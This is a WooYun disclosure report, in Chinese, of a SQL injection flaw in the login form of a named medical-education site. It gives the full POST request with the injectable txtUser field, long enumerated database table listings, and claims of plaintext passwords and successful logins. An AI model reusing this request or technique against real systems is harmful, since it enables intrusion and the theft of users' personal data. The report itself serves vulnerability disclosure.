华医网某站存在SQL注入（含全站用户账号密码/明文密码储存/敏感信息/且登陆成功）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160692

漏洞标题：华医网某站存在SQL注入（含全站用户账号密码/明文密码储存/敏感信息/且登陆成功）

漏洞作者：路人甲

提交时间：2015-12-14 12:10

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-14：细节已通知厂商并且等待厂商处理中
2015-12-18：厂商已经确认，细节仅向厂商公开
2015-12-28：细节向核心白帽子及相关领域专家公开
2016-01-07：细节向普通白帽子公开
2016-01-17：细节向实习白帽子公开
2016-01-28：细节向公众公开

简要描述：

涉及到什么地步呢，因为华医网的账号密码是通用的，http://www.91huayi.com/ 也能登陆

详细说明：

www.huayiyuan.com

POST注入

POST /default_2.aspx HTTP/1.1
Host: passport.huayiyuan.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.huayiyuan.com/
Cookie: __utma=205712394.1808971253.1442573384.1449037269.1449761004.9; __utmz=205712394.1444468190.7.5.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_9324e6decf5fc93aeefda5b2b3457ab4=1449037269,1449761003; Hm_lvt_b8b19370771d6914b2aac73158a962b8=1449037269,1449761003; Hm_lpvt_9324e6decf5fc93aeefda5b2b3457ab4=1449761003; Hm_lpvt_b8b19370771d6914b2aac73158a962b8=1449761003; __utmb=205712394.1.10.1449761004; __utmc=205712394; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyMzE0NzA0MzVkZNALNVMyBKPWl1Muden0TT39DWwv&txtUser=admin&txtPwd=123456&refer=&loginsubmit=%B5%C7%C2%BC&formhash=ba78271e

txtUser 可注入

漏洞证明：

表信息

Database: HY_COMMON_TABLEBACK
[89 tables]
+---------------------------------------------------+
| COM_PERSON                                        |
| COM_PERSONNEL715                                  |
| COM_PERSON_KJPT                                   |
| DSJ_comp_dept                                     |
| TestTB                                            |
| View_Personnel                                    |
| View_Personnel_v2                                 |
| YT_NOchongfu_1                                    |
| chengdu_person_view                               |
| cme_com_person_view                               |
| cme_user0701                                      |
| com_PERSONNEL628                                  |
| com_city                                          |
| com_county                                        |
| com_dictionary                                    |
| com_dictionary_kind                               |
| com_hospital                                      |
| com_hospital_attribute                            |
| com_hospital_cme                                  |
| com_ic_no_match                                   |
| com_main_unit                                     |
| com_main_unit20140228                             |
| com_main_unit628                                  |
| com_person_spec                                   |
| com_personnel                                     |
| com_personnel_bak_liu                             |
| com_personnel_ext                                 |
| com_personnel_rp                                  |
| com_personnel_rp_all                              |
| com_project                                       |
| com_province                                      |
| com_reg_back                                      |
| com_site_area                                     |
| com_site_dict                                     |
| com_speciality                                    |
| com_title                                         |
| com_unit_area                                     |
| com_unit_level                                    |
| com_unit_property                                 |
| com_user                                          |
| com_user_login                                    |
| com_user_login20121101                            |
| com_user_login20121112                            |
| com_user_login20141115                            |
| com_user_login20141115zg                          |
| com_user_login_真正重复账号
| com_user_login_重复账号
| com_user_project                                  |
| dict_speciality                                   |
| dtproperties                                      |
| exceptioninfo                                     |
| hy_com_Person                                     |
| hy_com_city                                       |
| hy_com_dept                                       |
| hy_com_dictionary                                 |
| hy_com_user_register                              |
| hy_com_user_register_v2                           |
| hy_common_person_merge_log                        |
| personnel_0516                                    |
| personnel_bak                                     |
| personnel_log                                     |
| project_log                                       |
| qianshandong                                      |
| sd711                                             |
| site_title                                        |
| tb_368078                                         |
| temp_0516                                         |
| tempdodata                                        |
| user_login_log                                    |
| v_com_pcc                                         |
| v_hy_com_hospital                                 |
| v_user_study_info                                 |
| view_kjpt_person                                  |
| ytno_faileure                                     |
| 一同卡号又问题
| 临床执业
| 临床执业_bak
| 助理医师
| 助理医师_bak
| 单位区域对照表
| 四川在岗
| 学历对照表
| 山东删除人员数据
| 手机处理20130806
| 江西数据
| 渭南2009
| 科教平台用户表
| 职称对照表
| 重复教学点
+---------------------------------------------------+
Database: master
[289 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| sys.all_columns                                   |
| sys.all_objects                                   |
| sys.all_parameters                                |
| sys.all_sql_modules                               |
| sys.all_views                                     |
| sys.allocation_units                              |
| sys.assemblies                                    |
| sys.assembly_files                                |
| sys.assembly_modules                              |
| sys.assembly_references                           |
| sys.assembly_types                                |
| sys.asymmetric_keys                               |
| sys.backup_devices                                |
| sys.certificates                                  |
| sys.check_constraints                             |
| sys.column_type_usages                            |
| sys.column_xml_schema_collection_usages           |
| sys.columns                                       |
| sys.computed_columns                              |
| sys.configurations                                |
| sys.conversation_endpoints                        |
| sys.conversation_groups                           |
| sys.credentials                                   |
| sys.crypt_properties                              |
| sys.data_spaces                                   |
| sys.database_files                                |
| sys.database_mirroring                            |
| sys.database_mirroring_endpoints                  |
| sys.database_mirroring_witnesses                  |
| sys.database_permissions                          |
| sys.database_principal_aliases                    |
| sys.database_principals                           |
| sys.database_recovery_status                      |
| sys.database_role_members                         |
| sys.databases                                     |
| sys.default_constraints                           |
| sys.destination_data_spaces                       |
| sys.dm_broker_activated_tasks                     |
| sys.dm_broker_forwarded_messages                  |
| sys.dm_broker_queue_monitors                      |
| sys.dm_clr_appdomains                             |
| sys.dm_clr_loaded_assemblies                      |
| sys.dm_clr_properties                             |
| sys.dm_clr_tasks                                  |
| sys.dm_db_file_space_usage                        |
| sys.dm_db_index_usage_stats                       |
| sys.dm_db_mirroring_connections                   |
| sys.dm_db_missing_index_details                   |
| sys.dm_db_missing_index_group_stats               |
| sys.dm_db_missing_index_groups                    |
| sys.dm_db_partition_stats                         |
| sys.dm_db_session_space_usage                     |
| sys.dm_db_task_space_usage                        |
| sys.dm_exec_background_job_queue                  |
| sys.dm_exec_background_job_queue_stats            |
| sys.dm_exec_cached_plans                          |
| sys.dm_exec_connections                           |
| sys.dm_exec_query_memory_grants                   |
| sys.dm_exec_query_optimizer_info                  |
| sys.dm_exec_query_resource_semaphores             |
| sys.dm_exec_query_stats                           |
| sys.dm_exec_query_transformation_stats            |
| sys.dm_exec_requests                              |
| sys.dm_exec_sessions                              |
| sys.dm_fts_active_catalogs                        |
| sys.dm_fts_index_population                       |
| sys.dm_fts_memory_buffers                         |
| sys.dm_fts_memory_pools                           |
| sys.dm_fts_population_ranges                      |
| sys.dm_io_backup_tapes                            |
| sys.dm_io_cluster_shared_drives                   |
| sys.dm_io_pending_io_requests                     |
| sys.dm_os_buffer_descriptors                      |
| sys.dm_os_child_instances                         |
| sys.dm_os_cluster_nodes                           |
| sys.dm_os_hosts                                   |
| sys.dm_os_latch_stats                             |
| sys.dm_os_loaded_modules                          |
| sys.dm_os_memory_allocations                      |
| sys.dm_os_memory_cache_clock_hands                |
| sys.dm_os_memory_cache_counters                   |
| sys.dm_os_memory_cache_entries                    |
| sys.dm_os_memory_cache_hash_tables                |
| sys.dm_os_memory_clerks                           |
| sys.dm_os_memory_objects                          |
| sys.dm_os_memory_pools                            |
| sys.dm_os_performance_counters                    |
| sys.dm_os_ring_buffers                            |
| sys.dm_os_schedulers                              |
| sys.dm_os_stacks                                  |
| sys.dm_os_sublatches                              |
| sys.dm_os_sys_info                                |
| sys.dm_os_tasks                                   |
| sys.dm_os_threads                                 |
| sys.dm_os_virtual_address_dump                    |
| sys.dm_os_wait_stats                              |
| sys.dm_os_waiting_tasks                           |
| sys.dm_os_worker_local_storage                    |
| sys.dm_os_workers                                 |
| sys.dm_qn_subscriptions                           |
| sys.dm_repl_articles                              |
| sys.dm_repl_schemas                               |
| sys.dm_repl_tranhash                              |
| sys.dm_repl_traninfo                              |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions                   |
| sys.dm_tran_current_snapshot                      |
| sys.dm_tran_current_transaction                   |
| sys.dm_tran_database_transactions                 |
| sys.dm_tran_locks                                 |
| sys.dm_tran_session_transactions                  |
| sys.dm_tran_top_version_generators                |
| sys.dm_tran_transactions_snapshot                 |
| sys.dm_tran_version_store                         |
| sys.endpoint_webmethods                           |
| sys.endpoints                                     |
| sys.event_notification_event_types                |
| sys.event_notifications                           |
| sys.events                                        |
| sys.extended_procedures                           |
| sys.extended_properties                           |
| sys.filegroups                                    |
| sys.foreign_key_columns                           |
| sys.foreign_keys                                  |
| sys.fulltext_catalogs                             |
| sys.fulltext_document_types                       |
| sys.fulltext_index_catalog_usages                 |
| sys.fulltext_index_columns                        |
| sys.fulltext_indexes                              |
| sys.fulltext_languages                            |
| sys.http_endpoints                                |
| sys.identity_columns                              |
| sys.index_columns                                 |
| sys.indexes                                       |
| sys.internal_tables                               |
| sys.key_constraints                               |
| sys.key_encryptions                               |
| sys.linked_logins                                 |
| sys.login_token                                   |
| sys.master_files                                  |
| sys.master_key_passwords                          |
| sys.message_type_xml_schema_collection_usages     |
| sys.messages                                      |
| sys.module_assembly_usages                        |
| sys.numbered_procedure_parameters                 |
| sys.numbered_procedures                           |
| sys.objects                                       |
| sys.openkeys                                      |
| sys.parameter_type_usages                         |
| sys.parameter_xml_schema_collection_usages        |
| sys.parameters                                    |
| sys.partition_functions                           |
| sys.partition_parameters                          |
| sys.partition_range_values                        |
| sys.partition_schemes                             |
| sys.partitions                                    |
| sys.plan_guides                                   |
| sys.procedures                                    |
| sys.remote_logins                                 |
| sys.remote_service_bindings                       |
| sys.routes                                        |
| sys.schemas                                       |
| sys.securable_classes                             |
| sys.server_assembly_modules                       |
| sys.server_event_notifications                    |
| sys.server_events                                 |
| sys.server_permissions                            |
| sys.server_principals                             |
| sys.server_role_members                           |
| sys.server_trigger_events                         |
| sys.server_triggers                               |
| sys.servers                                       |
| sys.service_broker_endpoints                      |
| sys.service_contract_message_usages               |
| sys.service_contract_usages                       |
| sys.service_contracts                             |
| sys.service_message_types                         |
| sys.service_queue_usages                          |
| sys.service_queues                                |
| sys.services                                      |
| sys.soap_endpoints                                |
| sys.sql_dependencies                              |
| sys.sql_logins                                    |
| sys.sql_modules                                   |
| sys.stats                                         |
| sys.stats_columns                                 |
| sys.symmetric_keys                                |
| sys.synonyms                                      |
| sys.sysaltfiles                                   |
| sys.syscacheobjects                               |
| sys.syscharsets                                   |
| sys.syscolumns                                    |
| sys.syscomments                                   |
| sys.sysconfigures                                 |
| sys.sysconstraints                                |
| sys.syscurconfigs                                 |
| sys.syscursorcolumns                              |
| sys.syscursorrefs                                 |
| sys.syscursors                                    |
| sys.syscursortables                               |
| sys.sysdatabases                                  |
| sys.sysdepends                                    |
| sys.sysdevices                                    |
| sys.sysfilegroups                                 |
| sys.sysfiles                                      |
| sys.sysforeignkeys                                |
| sys.sysfulltextcatalogs                           |
| sys.sysindexes                                    |
| sys.sysindexkeys                                  |
| sys.syslanguages                                  |
| sys.syslockinfo                                   |
| sys.syslogins                                     |
| sys.sysmembers                                    |
| sys.sysmessages                                   |
| sys.sysobjects                                    |
| sys.sysoledbusers                                 |
| sys.sysopentapes                                  |
| sys.sysperfinfo                                   |
| sys.syspermissions                                |
| sys.sysprocesses                                  |
| sys.sysprotects                                   |
| sys.sysreferences                                 |
| sys.sysremotelogins                               |
| sys.syssegments                                   |
| sys.sysservers                                    |
| sys.system_columns                                |
| sys.system_components_surface_area_configuration  |
| sys.system_internals_allocation_units             |
| sys.system_internals_partition_columns            |
| sys.system_internals_partitions                   |
| sys.system_objects                                |
| sys.system_parameters                             |
| sys.system_sql_modules                            |
| sys.system_views                                  |
| sys.systypes                                      |
| sys.sysusers                                      |
| sys.tables                                        |
| sys.tcp_endpoints                                 |
| sys.trace_categories                              |
| sys.trace_columns                                 |
| sys.trace_event_bindings                          |
| sys.trace_events                                  |
| sys.trace_subclass_values                         |
| sys.traces                                        |
| sys.transmission_queue                            |
| sys.trigger_events                                |
| sys.triggers                                      |
| sys.type_assembly_usages                          |
| sys.types                                         |
| sys.user_token                                    |
| sys.via_endpoints                                 |
| sys.views                                         |
| sys.xml_indexes                                   |
| sys.xml_schema_attributes                         |
| sys.xml_schema_collections                        |
| sys.xml_schema_component_placements               |
| sys.xml_schema_components                         |
| sys.xml_schema_elements                           |
| sys.xml_schema_facets                             |
| sys.xml_schema_model_groups                       |
| sys.xml_schema_namespaces                         |
| sys.xml_schema_types                              |
| sys.xml_schema_wildcard_namespaces                |
| sys.xml_schema_wildcards                          |
+---------------------------------------------------+
Database: HY_Common
[100 tables]
+---------------------------------------------------+
| 20150925zhejiang                                  |
| COM_PERSON                                        |
| DSJ_comp_dept                                     |
| MSpeer_lsns                                       |
| MSpeer_request                                    |
| MSpeer_response                                   |
| MSpub_identity_range                              |
| TestTB                                            |
| View_Personnel                                    |
| View_Personnel_v2                                 |
| chengdu_person_view                               |
| cme_com_person_view                               |
| com_city                                          |
| com_county                                        |
| com_dictionary                                    |
| com_dictionary_kind                               |
| com_hospital                                      |
| com_hospital_attribute                            |
| com_hospital_cme                                  |
| com_ic_no_match                                   |
| com_main_unit                                     |
| com_person_spec                                   |
| com_personnel                                     |
| com_personnel_ext                                 |
| com_personnel_rp                                  |
| com_project                                       |
| com_province                                      |
| com_reg_back                                      |
| com_site_area                                     |
| com_site_dict                                     |
| com_speciality                                    |
| com_title                                         |
| com_unit_area                                     |
| com_unit_level                                    |
| com_unit_property                                 |
| com_user                                          |
| com_user_login                                    |
| com_user_project                                  |
| danwei_bak                                        |
| dict_speciality                                   |
| dtproperties                                      |
| exceptioninfo                                     |
| hy_com_Person                                     |
| hy_com_Person_v2                                  |
| hy_com_city                                       |
| hy_com_dept                                       |
| hy_com_dictionary                                 |
| hy_com_user_register                              |
| hy_com_user_register_v2                           |
| hy_common_person_merge_log                        |
| personnel_log                                     |
| project_log                                       |
| qianshandong                                      |
| site_title                                        |
| sqlmapoutput                                      |
| syncobj_0x3134373644433832                        |
| syncobj_0x3141443136414141                        |
| syncobj_0x3241323937304430                        |
| syncobj_0x3246323844304239                        |
| syncobj_0x3338464544453439                        |
| syncobj_0x3431424242393832                        |
| syncobj_0x3431454543394239                        |
| syncobj_0x3543304535374539                        |
| syncobj_0x3836333741463146                        |
| syncobj_0x3842424135413536                        |
| syncobj_0x3933364332463435                        |
| syncobj_0x3941413841454245                        |
| syncobj_0x4132343946333730                        |
| syncobj_0x4141444242383538                        |
| syncobj_0x4143394236373832                        |
| syncobj_0x4230424141353035                        |
| syncobj_0x4344314334323634                        |
| syncobj_0x4345314634303046                        |
| syncobj_0x4346324545464338                        |
| syncobj_0x4432333331343538                        |
| syncobj_0x4433343331364231                        |
| syncobj_0x4437423946374645                        |
| syncobj_0x4539374343394642                        |
| syncobj_0x4635304543323243                        |
| syncobj_0x4636314239393236                        |
| syncobj_0x4639374530364239                        |
| syncobj_0x4639454536373632                        |
| sysarticlecolumns                                 |
| sysarticles                                       |
| sysarticleupdates                                 |
| sysextendedarticlesview                           |
| syspublications                                   |
| sysreplservers                                    |
| sysschemaarticles                                 |
| syssubscriptions                                  |
| systranschemas                                    |
| temp_0603                                         |
| user_login_log                                    |
| v_com_pcc                                         |
| v_hy_com_hospital                                 |
| v_user_study_info                                 |
| v_zhangguichao                                    |
| view_kjpt_person                                  |
| yang_unit2                                        |
| ytno_faileure                                     |
+---------------------------------------------------+
Database: msdb
[10 tables]
+---------------------------------------------------+
| backupfile                                        |
| backupmediafamily                                 |
| backupmediaset                                    |
| backupset                                         |
| logmarkhistory                                    |
| restorefile                                       |
| restorefilegroup                                  |
| restorehistory                                    |
| suspect_pages                                     |
| sysdac_instances                                  |
+---------------------------------------------------+

账号密码跑都跑不完

下面是账号密码，我不列那么多，你懂的

有了账号密码用户的信息一目了然

修复方案：

明文存储是个好技术

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-12-18 11:10

厂商回复：

谢谢关注！已提交技术部处理中，此漏洞重复提交了！

漏洞评价：

评价

2015-12-14 12:23 | Submit ( 普通白帽子 | Rank:526 漏洞数:118 | )

@疯狗 @浩天怎么走的小厂商啊，整站的账号密码都泄露了没天理啊
2015-12-18 11:37 | Submit ( 普通白帽子 | Rank:526 漏洞数:118 | )

@华医网哪里重复提交了？给个地址来，太过分了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160692

漏洞标题：华医网某站存在SQL注入（含全站用户账号密码/明文密码储存/敏感信息/且登陆成功）

相关厂商：91huayi.com

漏洞作者：路人甲

提交时间：2015-12-14 12:10

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160692

漏洞标题：华医网某站存在SQL注入（含全站用户账号密码/明文密码储存/敏感信息/且登陆成功）

相关厂商：91huayi.com

漏洞作者： 路人甲

提交时间：2015-12-14 12:10

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0160692"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云